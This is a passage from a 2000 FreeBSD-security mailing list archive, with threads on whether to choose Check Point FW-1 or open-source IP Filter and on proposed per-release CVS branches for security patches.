NT machine. > They don't trust ipfilter or anything else that is not commercial. > Maybe I could get some suits to guarentee it with a corporate label. > > Craig Some questions...who is running this project ? Who will be running the systems ? And who is "they" in the "They are going..." ? If you're the one who is running the systems then maybe you should make it abundantly clear that you've no desire at all to administer an NT firewall. Unless you're really inexperienced, there should not be a problem with finding a better job. If all they are interested in is commercial, then Sun Solaris with FW-1 on top of is a better choice than NT. If they start saying price is a factor, tell them Solaris x86 is cheaper, on the same hardware, than NT. Maybe you should printout the latest Black Hat briefing and drop it on their desk with an attached note saying something appropriate. You might want to add a note about how the best fix for some of these problems was to install a non-commercil firewall product to protect it. Challenge them on why they should trust a commercial product. Get them to actually read the license if they believe it is inherently better. I was bold enough to suggest developing software that was actually warranted for a use only to have someone point out that if it ever crashes for any person they are then able to sue you. No software company wants that to happen. Darren To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat Oct 7 11:40:12 2000 Delivered-To: freebsd-security@freebsd.org Received: from firefly.prairienet.org (firefly.prairienet.org [192.17.3.3]) by hub.freebsd.org (Postfix) with ESMTP id CD7FA37B671 for ; Sat, 7 Oct 2000 11:40:01 -0700 (PDT) Received: from sherman.spotnet (slip-82.prairienet.org [192.17.3.102]) by firefly.prairienet.org (8.9.3/8.9.3) with ESMTP id NAA04385; Sat, 7 Oct 2000 13:39:49 -0500 (CDT) Date: Sat, 7 Oct 2000 13:39:57 -0500 (CDT) From: David Talkington X-Sender: dtalk@sherman.spotnet To: Craig Cowen Cc: Darren Reed , "freebsd-security@FreeBSD.ORG" Subject: Re: Check Point FW-1 In-Reply-To: <39DEDD2B.E5BF4463@allmaui.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org -----BEGIN PGP SIGNED MESSAGE----- >Thanks, >They are going to put it on an NT machine. >They don't trust ipfilter or anything else that is not commercial. >Maybe I could get some suits to guarentee it with a corporate label. Two possible angles: a) it's natural for the boss to distrust what he or she doesn't understand (this is the most charitable explanation). If you have a good relationship with management, they truly care about data security, and they trust you, you'll have to understand their fear and try to educate them (by educating yourself to the nines). b) To a boss concerned about the bottom line, a purchase equals accountability (e.g., someone to sue when it breaks). This is (in my humble opinion) typical of management that doesn't really care about security of the company's data per se, but just wants their personal asses covered. Academics aside, you haven't said what your role is in this company, but if you're placed in a position of responsibility for an organization's security, and not given the authority to make decisions affecting that security, you'd better have a current resume. =) - -d - -- David Talkington Community Networking Initiative dtalk@prairienet.org 217-244-1962 PGP key: http://www.prairienet.org/~dtalk/dt000823.asc Craig Cowen wrote: > >Craig > >Darren Reed wrote: > >> In some mail from Craig Cowen, sie said: >> > >> > The big cheeses at work want to use check point instead of ipf or any >> > other open source solution. >> > Can anybody help me with vunerabilities to this so that I can change >> > thier minds? >> >> Tell them that IP Filter is the software which protects Firewall-1 from >> the Internet when running on Solaris - you have to go with naked FW-1 on >> NT. There are two factors to this equation, however. FW-1 is typically >> deployed on Solaris/NT machines although now the Nokia box makes up a >> large number of those sales. The Nokia boxes run IPSO which was, long >> ago, FreeBSD (I'm told it no longer bears much resemblence). >> >> Darren >> >> To Unsubscribe: send mail to majordomo@FreeBSD.org >> with "unsubscribe freebsd-security" in the body of the message > > > >To Unsubscribe: send mail to majordomo@FreeBSD.org >with "unsubscribe freebsd-security" in the body of the message > -----BEGIN PGP SIGNATURE----- Version: PGP 6.5.8 Comment: Made with pgp4pine 1.75-6 iQEVAwUBOd9uAb1ZYOtSwT+tAQFIYAf7B9wLYqVkBrHKbQp5Wmb+4CIwYZG7XLQH wcypMIu2pjjjvzzSq0DTK7GI0jWXn+1tcgUsID9S3MGseyZKDcmYIsjU0RlgzWBp AulCZ2xoBzpx9VK6Fca9OcOGgmJZFZwBDWgMaU2R0mifye2GMS3qtNPTZyBKa8lN jGRIa+YoWq9a8gc9N19fIvpML3xawfONSaP2kn0yvyFEMSV8PA/EP4CZe3qPq5/B gL6jwLger6G4Fn4pte+PCfsBckSEOGZ+pfUM5GqEbT6zXGkSusT+iypZYlEKAbBn WU14Pbb0Cv4bjeIbaYPpMLTFskiajQgfShM30zeJp05xNjjclc+NDw== =7L5Q -----END PGP SIGNATURE----- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat Oct 7 14:46:51 2000 Delivered-To: freebsd-security@freebsd.org Received: from peak.mountin.net (peak.mountin.net [207.227.119.2]) by hub.freebsd.org (Postfix) with ESMTP id 23BA437B502; Sat, 7 Oct 2000 14:46:41 -0700 (PDT) Received: (from daemon@localhost) by peak.mountin.net (8.9.1/8.9.1) id QAA18820; Sat, 7 Oct 2000 16:46:23 -0500 (CDT) (envelope-from jeff-ml@mountin.net) Received: from dial-88.max1.wa.cyberlynk.net(207.227.118.88) by peak.mountin.net via smap (V1.3) id sma018818; Sat Oct 7 16:46:20 2000 Message-Id: <4.3.2.20001007161924.00b72460@207.227.119.2> X-Sender: jeff-ml@207.227.119.2 X-Mailer: QUALCOMM Windows Eudora Version 4.3 Date: Sat, 07 Oct 2000 16:45:49 -0500 To: "Matthew D. Fuller" , Jordan Hubbard From: "Jeffrey J. Mountin" Subject: Re: Stable branch Cc: Robert Watson , John Baldwin , freebsd-security@FreeBSD.ORG, cvs-committers@FreeBSD.ORG In-Reply-To: <20001006180148.B29088@futuresouth.com> References: <3175.970802405@winston.osd.bsdi.com> <3175.970802405@winston.osd.bsdi.com> Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii"; format=flowed Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org At 06:01 PM 10/6/00 -0500, Matthew D. Fuller wrote: --snip-- >I think it might actually be easier to suck up and branch each release, >and stick security fixes on the branch, than to shoot this idea down >every few months for the rest of our lives ;) Then you might want to consider doing all the extra work involved in such a scheme or buy a lot of gifts for those that must then commit to 6 branches for 3.x and 3 (so far) for 4.x, etc. You seem to have completely missed Jordan's point this time and his previous point on wishing that commiters were better at merging stuff back from -current. The idea of binary patches for releases is better. Just hope that any such mechanism wouldn't end up like IRIX and be more of PITA than it is worth. Also means more time and resources are needed when bug/security fixes need to be merged back. A required patch set would be easier to avoid problems with a mix 'n' match scheme. Also seem to recall that branches are "expensive" with CVS. Not sure if that is just a one-time deal when laying a tag or a continuing liability. Regardless of the ideas that have cropped up on the various lists recently, it seems that the true "armchair generals" seem to forget the troops can just walk away without being deserters, so making things more difficult is NOT going to mean better results if the troops are not happy or leave the field. You could say I'm tired of hearing ideas that make *their* life better and don't consider the hassles induced by changing the production method. I'm not picking on Matt either, but it would explain why some ideas are shot down on a regular basis (ie bad/difficult then and still are). Jeff Mountin - jeff@mountin.net Systems/Network Administrator FreeBSD - the power to serve To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat Oct 7 15:51:43 2000 Delivered-To: freebsd-security@freebsd.org Received: from fledge.watson.org (fledge.watson.org [204.156.12.50]) by hub.freebsd.org (Postfix) with ESMTP id 72DC737B503; Sat, 7 Oct 2000 15:51:38 -0700 (PDT) Received: from fledge.watson.org (robert@fledge.pr.watson.org [192.0.2.3]) by fledge.watson.org (8.9.3/8.9.3) with SMTP id SAA87815; Sat, 7 Oct 2000 18:51:24 -0400 (EDT) (envelope-from robert@fledge.watson.org) Date: Sat, 7 Oct 2000 18:51:23 -0400 (EDT) From: Robert Watson X-Sender: robert@fledge.watson.org To: "Jeffrey J. Mountin" Cc: "Matthew D. Fuller" , Jordan Hubbard , John Baldwin , freebsd-security@FreeBSD.ORG, cvs-committers@FreeBSD.ORG Subject: Re: Stable branch In-Reply-To: <4.3.2.20001007161924.00b72460@207.227.119.2> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Sat, 7 Oct 2000, Jeffrey J. Mountin wrote: > >I think it might actually be easier to suck up and branch each release, > >and stick security fixes on the branch, than to shoot this idea down > >every few months for the rest of our lives ;) > > Then you might want to consider doing all the extra work involved in such a > scheme or buy a lot of gifts for those that must then commit to 6 branches > for 3.x and 3 (so far) for 4.x, etc. You seem to have completely missed > Jordan's point this time and his previous point on wishing that commiters > were better at merging stuff back from -current. You seem to misunderstand. No one is asking the majority of committers to commit to the release branches--in fact, that was specifically *prohibited* in the recommendation of a branch for each release. These branches would only exist for the purposes of release-related activity (modify the version numbers in the release branch, not the -STABLE branch), emergency back-ports during and immediately after the release itself, ERRATA entries for the release,and for security bugfixes. No new features. No new documentation work. Show stopper fixes only. This is for people who want to use a release, and have it be secure and work, not for people who want to sit on -STABLE. And if people who backport to -STABLE do any kind of decent reviewing job, and there's an adequate code freeze prior to the release branchpoint, then commits to -RELEASE branches should be *very* infrequent. Each commit (or set of related commits) on the -RELEASE branch would probably be designated a resulting patch level so that binary updates could be built based on it, constituting the binary update related to the security fix. The point of this branch is to allow our standard version control and distribution mechanisms to provide access to a version-controlled release patchlevel system. Robert N M Watson robert@fledge.watson.org http://www.watson.org/~robert/ PGP key fingerprint: AF B5 5F FF A6 4A 79 37 ED 5F 55 E9 58 04 6A B1 TIS Labs at Network Associates, Safeport Network Services To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat Oct 7 16:47:51 2000 Delivered-To: freebsd-security@freebsd.org Received: from jade.chc-chimes.com (jade.chc-chimes.com [216.28.46.6]) by hub.freebsd.org (Postfix) with ESMTP id 51B4C37B66D; Sat, 7 Oct 2000 16:47:43 -0700 (PDT) Received: by jade.chc-chimes.com (Postfix, from userid 1001) id 8702F1C69; Sat, 7 Oct 2000 19:47:30 -0400 (EDT) Date: Sat, 7 Oct 2000 19:47:30 -0400 From: Bill Fumerola To: "Jeffrey J. Mountin" Cc: "Matthew D. Fuller" , Jordan Hubbard , Robert Watson , John Baldwin , freebsd-security@FreeBSD.ORG, cvs-committers@FreeBSD.ORG Subject: Re: Stable branch Message-ID: <20001007194730.T38472@jade.chc-chimes.com> References: <3175.970802405@winston.osd.bsdi.com> <3175.970802405@winston.osd.bsdi.com> <20001006180148.B29088@futuresouth.com> <4.3.2.20001007161924.00b72460@207.227.119.2> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 1.0i In-Reply-To: <4.3.2.20001007161924.00b72460@207.227.119.2>; from jeff-ml@mountin.net on Sat, Oct 07, 2000 at 04:45:49PM -0500 X-Operating-System: FreeBSD 3.3-STABLE i386 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Sat, Oct 07, 2000 at 04:45:49PM -0500, Jeffrey J. Mountin wrote: > Then you might want to consider doing all the extra work involved in such a > scheme or buy a lot of gifts for those that must then commit to 6 branches > for 3.x and 3 (so far) for 4.x, etc. You seem to have completely missed > Jordan's point this time and his previous point on wishing that commiters > were better at merging stuff back from -current. Speaking as a {lazy,busy} committer: Mergeing to one branch is a pain, mergeing to multiple branches is even worse. Merging to RELENG_4_1, RELENG_4_2 etc means I would have to have a machine with the latest -STABLE of those branches, which is something I doubt I'll have every permutation of... BUT If all we did was merge critical security "oh-my-god" type fixes into those branches I'd be all for it (I'm not taking into account the CVS hell this would make in our RCS files, however..). -- Bill Fumerola - Network Architect, BOFH / Chimes, Inc. billf@chimesnet.com / billf@FreeBSD.org To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat Oct 7 16:52:48 2000 Delivered-To: freebsd-security@freebsd.org Received: from citusc17.usc.edu (citusc17.usc.edu [128.125.38.177]) by hub.freebsd.org (Postfix) with ESMTP id 4D52137B503; Sat, 7 Oct 2000 16:52:45 -0700 (PDT) Received: (from kris@localhost) by citusc17.usc.edu (8.9.3/8.9.3) id QAA17131; Sat, 7 Oct 2000 16:53:22 -0700 (PDT) Date: Sat, 7 Oct 2000 16:53:22 -0700 From: Kris Kennaway To: Robert Watson Cc: "Jeffrey J. Mountin" , "Matthew D. Fuller" , Jordan Hubbard , John Baldwin , freebsd-security@FreeBSD.org, cvs-committers@FreeBSD.org Subject: Re: Stable branch Message-ID: <20001007165322.A17115@citusc17.usc.edu> References: <4.3.2.20001007161924.00b72460@207.227.119.2> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: ; from rwatson@FreeBSD.org on Sat, Oct 07, 2000 at 06:51:23PM -0400 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Sat, Oct 07, 2000 at 06:51:23PM -0400, Robert Watson wrote: > You seem to misunderstand. No one is asking the majority of committers to > commit to the release branches--in fact, that was specifically > *prohibited* in the recommendation of a branch for each release. These > branches would only exist for the purposes of release-related activity > (modify the version numbers in the release branch, not the -STABLE > branch), emergency back-ports during and immediately after the release > itself, ERRATA entries for the release,and for security bugfixes. No new > features. No new documentation work. Show stopper fixes only. You know, I'm starting to think this could actually work. I have no idea of the impact it would have on CVS though - Peter? Kris To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat Oct 7 17:10:32 2000 Delivered-To: freebsd-security@freebsd.org Received: from jamus.xpert.com (jamus.xpert.com [199.203.132.17]) by hub.freebsd.org (Postfix) with ESMTP id 25A6237B677 for ; Sat, 7 Oct 2000 17:09:38 -0700 (PDT) Received: from roman (helo=localhost) by jamus.xpert.com with local-esmtp (Exim 3.12 #5) id 13i41w-0002g0-00; Sun, 08 Oct 2000 02:09:28 +0200 Date: Sun, 8 Oct 2000 02:09:28 +0200 (IST) From: Roman Shterenzon To: Brian Reichert Cc: "freebsd-security@FreeBSD.ORG" Subject: Re: Check Point FW-1 In-Reply-To: <20001007133804.C54883@numachi.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Sat, 7 Oct 2000, Brian Reichert wrote: > On Sat, Oct 07, 2000 at 05:49:09PM +0200, Roman Shterenzon wrote: > > Hi, > > Speaking for myself (Xpert are official ChekPoint dealer) I can say that > > although FW-1 might had some problems, it's quite good. > > It's quite secure as well (usually installed on Solaris/(sparc|i386) ) > > I've never installed it. I 'inherited' a CheckPoint box running > under Solaris, and, from an internel net had to break in to the > box to grant myself admin privs. > > I got in because UNIX services under SunOS 5.6 were misconfigured. > That's not CheckPoint's fault. But I don't think it's fair to > claim that the presence of CheckPoint makes the box secure... Again speaking for myself - I doubt that you or anybody else could have managed to break into solaris firewall I've installed (properly), unless of course there's some bug in CP fw1 which makes it possible. Of course the underlying os must be secure, and (!) the rules must be secure. The rules shouldn't have given you to talk to any service on the fw in the first place. So.. it was BADLY misconfigured. Again, I think for a commercial solution FW-1 is very good. --Roman Shterenzon, UNIX System Administrator and Consultant [ Xpert UNIX Systems Ltd., Herzlia, Israel. Tel: +972-9-9522361 ] To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat Oct 7 18: 3:19 2000 Delivered-To: freebsd-security@freebsd.org Received: from khavrinen.lcs.mit.edu (khavrinen.lcs.mit.edu [18.24.4.193]) by hub.freebsd.org (Postfix) with ESMTP id 0557437B503; Sat, 7 Oct 2000 18:03:14 -0700 (PDT) Received: (from wollman@localhost) by khavrinen.lcs.mit.edu (8.9.3/8.9.3) id VAA99935; Sat, 7 Oct 2000 21:01:51 -0400 (EDT) (envelope-from wollman) Date: Sat, 7 Oct 2000 21:01:51 -0400 (EDT) From: Garrett Wollman Message-Id: <200010080101.VAA99935@khavrinen.lcs.mit.edu> To: Kris Kennaway Cc: freebsd-security@FreeBSD.org, cvs-committers@FreeBSD.org Subject: Re: Stable branch In-Reply-To: <20001007165322.A17115@citusc17.usc.edu> References: <4.3.2.20001007161924.00b72460@207.227.119.2> <20001007165322.A17115@citusc17.usc.edu> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org < said: > I have no idea of the impact it would have on CVS though - Peter? The cvsup servers get put through hell whenever any tag is laid down, but I would be astonished if they got hammered any worse for two tags than they currently do for one. -GAWollman To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat Oct 7 18:10:56 2000 Delivered-To: freebsd-security@freebsd.org Received: from mail.enteract.com (mail.enteract.com [207.229.143.33]) by hub.freebsd.org (Postfix) with ESMTP id 487EB37B503 for ; Sat, 7 Oct 2000 18:10:52 -0700 (PDT) Received: from shell-1.enteract.com (jrs@shell-1.enteract.com [207.229.143.40]) by mail.enteract.com (8.9.3/8.9.3) with SMTP id UAA72281; Sat, 7 Oct 2000 20:10:42 -0500 (CDT) (envelope-from jrs@enteract.com) Date: Sat, 7 Oct 2000 20:10:42 -0500 (CDT) From: John Sconiers To: Roman Shterenzon Cc: Brian Reichert , "freebsd-security@FreeBSD.ORG" Subject: Re: Check Point FW-1 In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org If your going to use fw1 use it on nokia. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat Oct 7 19:28:16 2000 Delivered-To: freebsd-security@freebsd.org Received: from shell.futuresouth.com (shell.futuresouth.com [198.78.58.28]) by hub.freebsd.org (Postfix) with ESMTP id 1531137B502; Sat, 7 Oct 2000 19:28:07 -0700 (PDT) Received: (from fullermd@localhost) by shell.futuresouth.com (8.9.3/8.9.3) id VAA25451; Sat, 7 Oct 2000 21:27:12 -0500 (CDT) Date: Sat, 7 Oct 2000 21:27:12 -0500 From: "Matthew D. Fuller" To: Bill Fumerola Cc: "Jeffrey J. Mountin" , Jordan Hubbard , Robert Watson , John Baldwin , freebsd-security@FreeBSD.ORG, cvs-committers@FreeBSD.ORG Subject: Re: Stable branch Message-ID: <20001007212711.A24996@futuresouth.com> References: <3175.970802405@winston.osd.bsdi.com> <3175.970802405@winston.osd.bsdi.com> <20001006180148.B29088@futuresouth.com> <4.3.2.20001007161924.00b72460@207.227.119.2> <20001007194730.T38472@jade.chc-chimes.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <20001007194730.T38472@jade.chc-chimes.com>; from billf@chimesnet.com on Sat, Oct 07, 2000 at 07:47:30PM -0400 X-OS: FreeBSD Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Sat, Oct 07, 2000 at 07:47:30PM -0400, a little birdie told me that Bill Fumerola remarked > > Speaking as a {lazy,busy} committer: Mergeing to one branch is a pain, > mergeing to multiple branches is even worse. Merging to RELENG_4_1, > RELENG_4_2 etc means I would have to have a machine with the latest > -STABLE of those branches, which is something I doubt I'll have every > permutation of... > > BUT > > If all we did was merge critical security "oh-my-god" type fixes into those > branches I'd be all for it (I'm not taking into account the CVS hell this > would make in our RCS files, however..). (reply to all the messages, public and private about this in one place) That was my intention there; god knows I wouldn't want to deal with having 8 -STABLE branches at once! But a per-release branch for the 'oh shit' security holes, and possibly showstopper bugs, might be doable. I understand the branching does fun things to CVS, so it's a tradeoff either way; CVS twiddleadge and rare (hopefully VERY rare; we don't make mistakes, do we? ;) commiter time, vs. easier updates to specific releases. And if we bump patchlevels on the release (3.5.1-RELEASE p2 or something similar in uname), we can make it easier on the users to see when they have a patched version. Possible fun problems I see include rolling releases, having them on FTP sites, etc. OTOH, keeping only the latest patchlevel on the FTP sites (I doubt there'd often be more than 1 or possibly two patches per release, big security holes in the base system aren't THAT common) would make it easier to keep new installs having secure systems, and just keeping the per-release branches updated for X time (1 year? 2 years?) would keep it from snowballing out of control as we go through 5-STABLE, 6-STABLE, etc. -- Matthew Fuller (MF4839) | fullermd@over-yonder.net Unix Systems Administrator | fullermd@futuresouth.com Specializing in FreeBSD | http://www.over-yonder.net/ "The only reason I'm burning my candle at both ends, is because I haven't figured out how to light the middle yet" To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat Oct 7 20: 1:13 2000 Delivered-To: freebsd-security@freebsd.org Received: from peak.mountin.net (peak.mountin.net [207.227.119.2]) by hub.freebsd.org (Postfix) with ESMTP id AA8AB37B66C; Sat, 7 Oct 2000 20:01:08 -0700 (PDT) Received: (from daemon@localhost) by peak.mountin.net (8.9.1/8.9.1) id WAA20262; Sat, 7 Oct 2000 22:01:07 -0500 (CDT) (envelope-from jeff-ml@mountin.net) Received: from dial-73.max1.wa.cyberlynk.net(207.227.118.73) by peak.mountin.net via smap (V1.3) id sma020256; Sat Oct 7 22:00:40 2000 Message-Id: <4.3.2.20001007214506.00bb7c10@207.227.119.2> X-Sender: jeff-ml@207.227.119.2 X-Mailer: QUALCOMM Windows Eudora Version 4.3 Date: Sat, 07 Oct 2000 21:59:48 -0500 To: Robert Watson From: "Jeffrey J. Mountin" Subject: Re: Stable branch Cc: "Matthew D. Fuller" , Jordan Hubbard , John Baldwin , freebsd-security@FreeBSD.ORG, cvs-committers@FreeBSD.ORG In-Reply-To: References: <4.3.2.20001007161924.00b72460@207.227.119.2> Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii"; format=flowed Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org At 06:51 PM 10/7/00 -0400, Robert Watson wrote: >You seem to misunderstand. No one is asking the majority of committers to >commit to the release branches--in fact, that was specifically >*prohibited* in the recommendation of a branch for each release. These >branches would only exist for the purposes of release-related activity >(modify the version numbers in the release branch, not the -STABLE >branch), emergency back-ports during and immediately after the release >itself, ERRATA entries for the release,and for security bugfixes. No new >features. No new documentation work. Show stopper fixes only. Now your earlier proposal makes better sense. At lot more for the CVS-meisters to deal with, but they can answer that magic question. Also may be an issue to branch old releases, then it might be worth doing all the branching at one time and disallowing access. Then the question would be for how long do we want to do patches for old releases. One other idea that cropped up would be if we want to set this up for the more troublesome releases like 3.2 to force them to upgrade to a later version. Think that only 3.4+ should be considered due to a large enough install base to consider. Jeff Mountin - jeff@mountin.net Systems/Network Administrator FreeBSD - the power to serve To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat Oct 7 20:38:54 2000 Delivered-To: freebsd-security@freebsd.org Received: from fledge.watson.org (fledge.watson.org [204.156.12.50]) by hub.freebsd.org (Postfix) with ESMTP id 2281A37B66C; Sat, 7 Oct 2000 20:38:47 -0700 (PDT) Received: from fledge.watson.org (robert@fledge.pr.watson.org [192.0.2.3]) by fledge.watson.org (8.9.3/8.9.3) with SMTP id XAA90825; Sat, 7 Oct 2000 23:36:05 -0400 (EDT) (envelope-from robert@fledge.watson.org) Date: Sat, 7 Oct 2000 23:36:05 -0400 (EDT) From: Robert Watson X-Sender: robert@fledge.watson.org To: "Jeffrey J. Mountin" Cc: "Matthew D. Fuller" , Jordan Hubbard , John Baldwin , freebsd-security@FreeBSD.ORG, cvs-committers@FreeBSD.ORG Subject: Re: Stable branch In-Reply-To: <4.3.2.20001007214506.00bb7c10@207.227.119.2> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Sat, 7 Oct 2000, Jeffrey J. Mountin wrote: > Now your earlier proposal makes better sense. At lot more for the > CVS-meisters to deal with, but they can answer that magic question. > Also may be an issue to branch old releases, then it might be worth > doing all the branching at one time and disallowing access. Well, at least for the purposes of the release engineer, the major change is adding a "-b" to the CVS tag operation. However, and important question, which you raised in a prior e-mail, is whether or not this places an undue burden on CVS due to expensive branch handling. My hope is that it would be not, but presumably a CVS meister (Peter?) should enlighten us. I have no idea how branching for older versions would work: it may be that we just start doing this now, for new releases. > Then the question would be for how long do we want to do patches for old > releases. Which is a question we've always been faced with, only hopefully this will make life easier. With the recent security issues, we've had some luck in identifying people who are willing to backport fixes (Alfred, Jeroen). I'd certainly be willing to pick up some load, and Kris has demonstrated interest in covering the most recent -STABLE and -CURRENT trees. > One other idea that cropped up would be if we want to set this up for > the more troublesome releases like 3.2 to force them to upgrade to a > later version. Think that only 3.4+ should be considered due to a large > enough install base to consider. Yes, I think it would be reasonable, for older versions and -STABLE branches, to limit the scope in which fixes are available -- i.e., put them into the head of the -STABLE branch, and the last -RELEASE on the branch. Thanks, Robert N M Watson robert@fledge.watson.org http://www.watson.org/~robert/ PGP key fingerprint: AF B5 5F FF A6 4A 79 37 ED 5F 55 E9 58 04 6A B1 TIS Labs at Network Associates, Safeport Network Services To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat Oct 7 20:51:39 2000 Delivered-To: freebsd-security@freebsd.org Received: from rover.village.org (rover.village.org [204.144.255.49]) by hub.freebsd.org (Postfix) with ESMTP id 6AADE37B503; Sat, 7 Oct 2000 20:51:34 -0700 (PDT) Received: from harmony.village.org (harmony.village.org [10.0.0.6]) by rover.village.org (8.11.0/8.11.0) with ESMTP id e983pWY01182; Sat, 7 Oct 2000 21:51:32 -0600 (MDT) (envelope-from imp@harmony.village.org) Received: from harmony.village.org (localhost.village.org [127.0.0.1]) by harmony.village.org (8.9.3/8.8.3) with ESMTP id VAA02166; Sat, 7 Oct 2000 21:51:32 -0600 (MDT) Message-Id: <200010080351.VAA02166@harmony.village.org> To: Robert Watson Subject: Re: Stable branch Cc: freebsd-security@FreeBSD.org, cvs-committers@FreeBSD.org In-reply-to: Your message of "Sat, 07 Oct 2000 23:36:05 EDT." References: Date: Sat, 07 Oct 2000 21:51:32 -0600 From: Warner Losh Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org In message Robert Watson writes: : Well, at least for the purposes of the release engineer, the major change : is adding a "-b" to the CVS tag operation. However, and important : question, which you raised in a prior e-mail, is whether or not this : places an undue burden on CVS due to expensive branch handling. My hope : is that it would be not, but presumably a CVS meister (Peter?) should : enlighten us. I have no idea how branching for older versions would work: : it may be that we just start doing this now, for new releases. You don't need to branch each release. You only need to branch those files that actually change. Normally a branch needs a tag at the branch, but we wouldn't in this case because we'd already have one (the relase tag would already be there). This would put very little load on the cvs repo. Warner To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat Oct 7 21:27:28 2000 Delivered-To: freebsd-security@freebsd.org Received: from cairo.anu.edu.au (cairo.anu.edu.au [150.203.224.11]) by hub.freebsd.org (Postfix) with ESMTP id DCC8737B66C for ; Sat, 7 Oct 2000 21:27:24 -0700 (PDT) Received: (from avalon@localhost) by cairo.anu.edu.au (8.9.3/8.9.3) id PAA19412; Sun, 8 Oct 2000 15:27:07 +1100 (EST) From: Darren Reed Message-Id: <200010080427.PAA19412@cairo.anu.edu.au> Subject: Re: Check Point FW-1 To: dtalk@prairienet.org (David Talkington) Date: Sun, 8 Oct 2000 15:27:07 +1100 (Australia/NSW) Cc: craig@allmaui.com (Craig Cowen), avalon@coombs.anu.edu.au (Darren Reed), freebsd-security@FreeBSD.ORG (freebsd-security@FreeBSD.ORG) In-Reply-To: from "David Talkington" at Oct 07, 2000 01:39:57 PM X-Mailer: ELM [version 2.5 PL1] MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org In some mail from David Talkington, sie said: > > b) To a boss concerned about the bottom line, a purchase equals > accountability (e.g., someone to sue when it breaks). This is (in my > humble opinion) typical of management that doesn't really care about > security of the company's data per se, but just wants their personal > asses covered. For the record, you can't sue anyone who's got the "standard" software license/disclaimer over the failure of it to perform or be bug free. Read it one day and actually see what it's all about. What is really the difference is being able to dial 1-800-FIREWALL and have someone help you out, etc. Darren To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat Oct 7 21:40: 0 2000 Delivered-To: freebsd-security@freebsd.org Received: from homer.softweyr.com (bsdconspiracy.net [208.187.122.220]) by hub.freebsd.org (Postfix) with ESMTP id ED32D37B502 for ; Sat, 7 Oct 2000 21:39:56 -0700 (PDT) Received: from localhost ([127.0.0.1] helo=softweyr.com ident=Fools trust ident!) by homer.softweyr.com with esmtp (Exim 3.16 #1) id 13i8L4-00006p-00; Sat, 07 Oct 2000 22:45:30 -0600 Message-ID: <39DFFBE9.546DFE24@softweyr.com> Date: Sat, 07 Oct 2000 22:45:30 -0600 From: Wes Peters Organization: Softweyr LLC X-Mailer: Mozilla 4.75 [en] (X11; U; FreeBSD 4.1-STABLE i386) X-Accept-Language: en MIME-Version: 1.0 To: Darren Reed Cc: David Talkington , Craig Cowen , "freebsd-security@FreeBSD.ORG" Subject: Re: Check Point FW-1 References: <200010080427.PAA19412@cairo.anu.edu.au> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Darren Reed wrote: > > In some mail from David Talkington, sie said: > > > > b) To a boss concerned about the bottom line, a purchase equals > > accountability (e.g., someone to sue when it breaks). This is (in my > > humble opinion) typical of management that doesn't really care about > > security of the company's data per se, but just wants their personal > > 